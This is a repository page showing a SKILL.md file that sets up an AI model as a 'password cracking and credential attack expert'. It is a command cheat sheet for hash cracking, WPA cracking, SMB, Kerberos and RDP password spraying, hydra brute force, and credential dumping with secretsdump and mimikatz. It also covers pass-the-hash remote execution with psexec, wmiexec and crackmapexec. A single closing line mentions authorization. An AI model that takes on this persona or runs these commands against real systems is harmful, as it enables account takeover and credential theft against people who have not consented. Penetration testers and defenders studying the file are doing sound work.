zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
33a29e697aa02f2496e9797c09d2dfab3440254e
gh-trilwu-secskills-secskills/skills/password-attacks/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

492 lines
9.7 KiB
Markdown
Raw Blame History

---
name: cracking-passwords
description: Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
---
# Password Attacks and Credential Cracking Skill
You are a password cracking and credential attack expert. Use this skill when the user requests help with:
- Password hash cracking (hashcat, john)
- Hash identification and extraction
- Credential spraying and brute forcing
- Rainbow table attacks
- Pass-the-hash techniques
- Wordlist generation
- Rule-based attacks
## Core Methodologies
### 1. Hash Identification
**Identify Hash Type:**
```bash
# hashid
hashid 'hash_here'
hashid -m 'hash_here' # Show hashcat mode
# hash-identifier
hash-identifier
# haiti
haiti 'hash_here'
# Manual identification by format
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars (same as MD5 but context differs)
# bcrypt: $2a$, $2b$, $2y$ prefix
```
**Common Hash Formats:**
```
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA256: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
NTLM: 209c6174da490caeb422f3fa5a7ae634
NTLMv2: username::domain:challenge:response:response
bcrypt: $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
Linux SHA512: $6$rounds=5000$...
```
### 2. Hashcat Basics
**Installation:**
```bash
# Kali Linux
apt install hashcat
# Check GPUs
hashcat -I
```
**Basic Hashcat Usage:**
```bash
# Dictionary attack
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt
# Dictionary + rules
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt -r rules/best64.rule
# Brute force
hashcat -m <hash_type> -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Combination attack
hashcat -m <hash_type> -a 1 hashes.txt wordlist1.txt wordlist2.txt
# Show cracked passwords
hashcat -m <hash_type> hashes.txt --show
# Resume session
hashcat -m <hash_type> hashes.txt wordlist.txt --session mysession
hashcat --session mysession --restore
```
**Common Hash Types (-m flag):**
```bash
0 = MD5
100 = SHA1
1400 = SHA256
1700 = SHA512
1000 = NTLM
5600 = NetNTLMv2
3200 = bcrypt
1800 = sha512crypt (Linux)
7500 = Kerberos 5 AS-REP (krb5asrep)
13100 = Kerberos 5 TGS-REP (krb5tgs)
18200 = Kerberos 5 AS-REP (asreproast)
16800 = WPA-PMKID-PBKDF2
22000 = WPA-PBKDF2-PMKID+EAPOL
```
**Hashcat Attack Modes:**
```bash
-a 0 # Dictionary attack
-a 1 # Combination attack
-a 3 # Brute-force attack
-a 6 # Hybrid wordlist + mask
-a 7 # Hybrid mask + wordlist
```
**Hashcat Masks:**
```bash
?l = lowercase letters (a-z)
?u = uppercase letters (A-Z)
?d = digits (0-9)
?s = special characters
?a = all characters (?l?u?d?s)
?b = binary (0x00 - 0xff)
# Examples
?u?l?l?l?l?d?d # Password01
?d?d?d?d # 4-digit PIN
?a?a?a?a?a?a # 6 characters (any)
```
### 3. John the Ripper
**Basic John Usage:**
```bash
# Auto-detect and crack
john hashes.txt
# Specify format
john --format=NT hashes.txt
john --format=Raw-SHA256 hashes.txt
# With wordlist
john --wordlist=rockyou.txt hashes.txt
# With rules
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked passwords
john --show hashes.txt
john --show --format=NT hashes.txt
# List formats
john --list=formats
```
**Common John Formats:**
```bash
Raw-MD5
Raw-SHA1
Raw-SHA256
NT (NTLM)
LM
bcrypt
sha512crypt
krb5asrep
krb5tgs
```
**Unshadow (Linux):**
```bash
# Combine passwd and shadow files
unshadow passwd shadow > unshadowed.txt
john unshadowed.txt
```
### 4. Specific Hash Type Attacks
**NTLM Hashes:**
```bash
# Hashcat
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -r rules/best64.rule
# John
john --format=NT --wordlist=rockyou.txt ntlm.txt
```
**NTLMv2 (NetNTLMv2):**
```bash
# Hashcat
hashcat -m 5600 ntlmv2.txt rockyou.txt
# Captured from Responder
hashcat -m 5600 Responder-Session.txt rockyou.txt
```
**Kerberoast (TGS-REP):**
```bash
# Hashcat (RC4)
hashcat -m 13100 tgs.txt rockyou.txt --force
# John
john --format=krb5tgs --wordlist=rockyou.txt tgs.txt
```
**ASREPRoast:**
```bash
# Hashcat
hashcat -m 18200 asrep.txt rockyou.txt
# John
john --format=krb5asrep asrep.txt
```
**bcrypt:**
```bash
# Hashcat (slow!)
hashcat -m 3200 bcrypt.txt wordlist.txt
# John
john --format=bcrypt bcrypt.txt
```
**Linux SHA512 ($6$):**
```bash
# Hashcat
hashcat -m 1800 shadow.txt rockyou.txt
# John
john --format=sha512crypt shadow.txt
```
**WPA/WPA2:**
```bash
# Convert pcap to hashcat format
hcxpcapngtool -o hash.hc22000 capture.pcap
# Crack PMKID
hashcat -m 22000 hash.hc22000 wordlist.txt
# Or convert with aircrack tools
aircrack-ng -J output capture.cap
hccap2john output.hccap > hash.john
john hash.john
```
### 5. Wordlist Generation
**CeWL (Web Scraping):**
```bash
# Generate wordlist from website
cewl -d 2 -m 5 -w wordlist.txt https://example.com
# Include email addresses
cewl -e -d 2 -m 5 -w wordlist.txt https://example.com
```
**crunch:**
```bash
# Generate all combinations
crunch 6 8 -t Pass@@@ -o wordlist.txt
# @=lowercase, ,=uppercase, %=numbers, ^=symbols
# Generate passwords between 6-8 chars
crunch 6 8 abcdefg123 -o wordlist.txt
# Pattern-based (e.g., Month+Year)
crunch 10 10 -t @@@@@@@%%% -o wordlist.txt
```
**John Mutation Rules:**
```bash
# Generate mutations
john --wordlist=base.txt --rules --stdout > mutated.txt
# Custom rule
# In john.conf:
[List.Rules:CustomRule]
l # lowercase all
u # uppercase all
c # capitalize
$[0-9] # append digit
^[0-9] # prepend digit
```
**Maskprocessor:**
```bash
# Generate based on mask
mp64.exe ?u?l?l?l?l?d?d?d
mp64.exe -1 ?l?u -2 ?d?s ?1?1?1?1?2?2
```
**CUPP (User Profile):**
```bash
# Interactive wordlist generator based on target info
python3 cupp.py -i
```
### 6. Credential Spraying
**Spray Weak Passwords:**
```bash
# Common weak passwords
Password123
Welcome123
Company123
Spring2024
Summer2024
```
**SMB Password Spray:**
```bash
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Password123' --continue-on-success
# Single password, multiple users
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123'
```
**Kerberos Password Spray:**
```bash
# kerbrute
kerbrute passwordspray -d domain.local users.txt Password123
# Impacket
for user in $(cat users.txt); do
GetNPUsers.py domain.local/${user}:Password123 -dc-ip 10.10.10.10 -no-pass -request
done
```
**RDP Password Spray:**
```bash
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -U users.txt -c 'Password123'
# hydra (be careful - noisy!)
hydra -L users.txt -p 'Password123' rdp://10.10.10.10
```
### 7. Online Brute Force
**Hydra:**
```bash
# HTTP POST login
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# SSH
hydra -l root -P passwords.txt ssh://10.10.10.10
# FTP
hydra -l admin -P passwords.txt ftp://10.10.10.10
# SMB
hydra -L users.txt -P passwords.txt smb://10.10.10.10
# RDP
hydra -L users.txt -P passwords.txt rdp://10.10.10.10
```
**Medusa:**
```bash
# SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# SMB
medusa -h 10.10.10.10 -U users.txt -P passwords.txt -M smbnt
```
### 8. Pass-the-Hash
**Extract NTLM Hashes:**
```bash
# secretsdump (from SAM)
secretsdump.py -sam sam.hive -system system.hive LOCAL
# secretsdump (from DC)
secretsdump.py domain/user:password@10.10.10.10
# mimikatz
sekurlsa::logonpasswords
lsadump::sam
```
**Use NTLM Hash:**
```bash
# pth-winexe
pth-winexe -U domain/user%hash //10.10.10.10 cmd
# crackmapexec
crackmapexec smb 10.10.10.10 -u administrator -H 'hash' -x whoami
# psexec.py
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec.py
wmiexec.py -hashes :hash administrator@10.10.10.10
```
## Useful Wordlists
**Common Locations:**
```bash
# Kali Linux
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/
# Download rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
```
**SecLists:**
```bash
# Download
git clone https://github.com/danielmiessler/SecLists.git
# Common passwords
SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
SecLists/Passwords/Common-Credentials/10k-most-common.txt
```
**Custom Wordlists:**
```bash
# Generate targeted wordlist
# Combine company name, years, common patterns
# Example: CompanyName2024!, CompanyName@2024, etc.
```
## Performance Optimization
**Hashcat Optimizations:**
```bash
# Use GPU
hashcat -m 1000 hashes.txt wordlist.txt -d 1
# Increase workload
hashcat -m 1000 hashes.txt wordlist.txt -w 3 # 1-4, higher = faster
# Show status
hashcat -m 1000 hashes.txt wordlist.txt --status --status-timer=10
# Benchmark
hashcat -b
# Use rules efficiently
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule --loopback
```
## Troubleshooting
**Hashcat Not Using GPU:**
```bash
# Check GPU drivers
nvidia-smi # NVIDIA
rocm-smi # AMD
# Force specific device
hashcat -d 1 ...
```
**Hash Format Issues:**
```bash
# Remove username prefix
cut -d: -f2 hashes.txt > clean_hashes.txt
# Ensure proper format (user:hash)
cat hashes.txt | awk -F: '{print $1":"$4}'
```
**Slow Cracking:**
```bash
# Try smaller wordlist first
# Use targeted rules
# Consider cloud GPU instances
# Use mask attack for known patterns
```
## Reference Links
- Hashcat Wiki: https://hashcat.net/wiki/
- John the Ripper: https://www.openwall.com/john/
- SecLists: https://github.com/danielmiessler/SecLists
- HackTricks Password Attacks: https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
## When to Use This Skill
Activate this skill when the user asks to:
- Crack password hashes
- Identify unknown hash types
- Perform password spraying
- Generate wordlists
- Optimize hashcat/john performance
- Extract and crack credentials
- Perform pass-the-hash attacks
- Help with credential-based attacks
Always ensure proper authorization before performing password attacks.
Reference in New Issue View Git Blame Copy Permalink